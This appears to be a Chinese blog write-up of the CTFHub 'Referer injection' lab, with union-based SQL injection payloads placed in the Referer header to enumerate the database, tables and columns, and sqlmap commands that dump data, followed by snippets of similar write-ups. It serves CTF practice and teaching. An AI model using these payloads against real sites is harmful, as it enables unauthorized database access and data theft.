ctfhub Refer注入

最新推荐文章于 2024-06-03 17:36:29 发布
最新推荐文章于 2024-06-03 17:36:29 发布
阅读量900 收藏
点赞数
分类专栏: SQL注入及其知识原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43326436/article/details/106672620
版权

1,实验环境
ctfhubsql注入
2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。)
直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。
3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样)
显示出了数据库是sqli
继续爆表
123 union select (select group_concat(table_name) from information_schema.tables where table_schema=‘sqli’),2 #
爆出表是news,sydjjhbycb 两个,我们爆其中的一个。
123 union select (select group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘sydjjhbycb’),2 #
爆出字段uugrdnslsn
查询字段数
123 union select (select uugrdnslsn from sqli.sydjjhbycb),2 #
出现了结果

第二种用工具据举另外一个例子
用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破。。(根据reger注入level需要大于三)
python sqlmap.py -r “xxxxx.txt” -p referer --level 5 --dbs

python sqlmap.py -r “xxxxx.txt” -p referer --level 5 -D sqli --tables

python sqlmap.py -r “xxxxx.txt” -p referer --level 5 -D sqli -T asdnfa --columns --dump
有问题或者错误私信或者评论。。。。。。。。。。。。。。。。

芋圆奶绿,要半t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入思路详解
12-14
Refer Host     3.SQL语句测试 由于现在许多web站点都受到WAF防护或者应用开发者自带的代码层Filter,在判断是否存在Sql注入时, 测试payload越简单越好   数字型 数字型 字符型 字符型
noreferrer去除网页跳转refer
12-13
标题“noreferrer去除网页跳转refer”指的正是利用`noreferrer`属性来防止`Referer`头在链接跳转时被发送到目标网站。当一个链接带有`rel="noreferrer"`属性时,浏览器在请求目标页面时将不会包含`Referer`头信息,...
CTFHUB-Cookie注入
Web学习之路
03-28 202
cookie啊
CTFHub-referer注入
m0_51589948的博客
05-19 854
referer注入 根据提示寻找referer,对其进行bp抓包,并发包到repeaterreferer进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_sche
sql注入 (运用sqlmap解题)
最新发布
Z11762的博客
06-03 1180
注:level参数使用–batch参数可指定payload测试复杂等级。共有五个级别,从1-5,默认值为1。等级越高,测试的payload越复杂,当使用默认等级注入不出来时,可以尝试使用–level来提高测试等级。--level参数决定了 sqlmap 在检测 SQL 注入时的 “努力程度”。
CTFHub | Refer注入
尼泊罗河伯的博客
11-26 1695
根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer请求中使用 payload 进行测试,发现此题存在 Refer注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
CTFHub - Refer注入
Have_a_great_day的博客
09-12 595
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFhub Refer注入
plant1234的博客
06-18 1324
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
RMA_refer6
07-13
《RMA Refer6:深入理解RMA流程与实践》 在IT行业中,RMA(Return Material Authorization)是一项至关重要的服务流程,它涉及到产品的售后服务、维修和更换。"RMA_refer6"这一主题,结合"RMA refer"的标签,表明...
论文研究-SIP事件扩展REFER方法研究 .pdf
08-16
SIP事件扩展REFER方法研究,周昕,高泽华,本文介绍了sip协议新增方法refer,同时分析了osip2和eXosip协议栈,指出了refer在eXosip中的具体实现。采用此方法,可以灵活地实现许多新的��
CTFHub-referer注入-wp
z1moq的博客
05-18 283
referer注入 注入点如图 测试出能够注入后使用字符型注入语法即可 sqlmap做法同UA注入 HTTP_REFERER简介 HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 ...
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 458
提示:本文章仅限学习参考,切勿用于非法用途。
CTFHUB-WEB-SQL注入-Refer注入
weixin_43486981的博客
08-11 984
题目: 靶机环境: 使用burp suite 抓包,发现包信息中并没有refer字段。 根据提示,添加referer字段,进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 744
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
CTFHUB-SQL注入-refer注入
u014794539的博客
07-10 457
考点 sql refer注入 过程分析 hackbar发送refer 然后发送repeater抓包 GET / HTTP/1.1 Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
Static______的博客
04-09 1328
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
CtfHub-web-sql注入
BROTHERYY的博客
05-08 551
1.整数型注入 确定注入点! 得到数据库以及版本 得到字段! 字段也是flag 2.字符型注入 这里和数字型差不多 使用单引号闭合就可以 by 3 就没回显 确定只有2 得到数据库和版本号 发现和上面的数字型一样 直接注flag吧 3.报错注入 这里直接sqlmap跑一把 猜测还是一样的表名,字段名直接一把撸到底 4.bool注入 这个自己尝试写了个脚本跑出来了 但是自己的脚本水平太烂 ! 下步加强学习 上面试sqlmap的下面是自己写的 5.时间注入 这里也是使用脚本跑,这里发现自己的脚本和s
CTFHub(UA注入Refer注入
sGanYu
07-27 2788
UA注入 UA是什么?UA也称User-Agent,当用户发起一个请求时,网站会通过判断 UA的数据,如(名称,版本,浏览器内核,内核版本)等等,来给不同的操作系统,不同的浏览器发送不同的页面 一般来说,普通的 SQL 注入是对 URL 及参数进行的,但这里攻击者却将 SQL 查询语句隐藏在了 HTTP 头部的User-Agent字段之中 ,也称UA注入 查询中用到的参数: column_name:列的名称 Information_schema.columns:表示所有的列的信息 Informa
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1223
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
qnetworkinterfacedoes not refer to a value
06-06
当报错提示“QNetworkInterface does not refer to a value”时,通常是因为编写的代码使用了未定义或未声明的QNetworkInterface变量或对象,或者QNetworkInterface被误认为是一个变量而不是类。解决这个问题的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值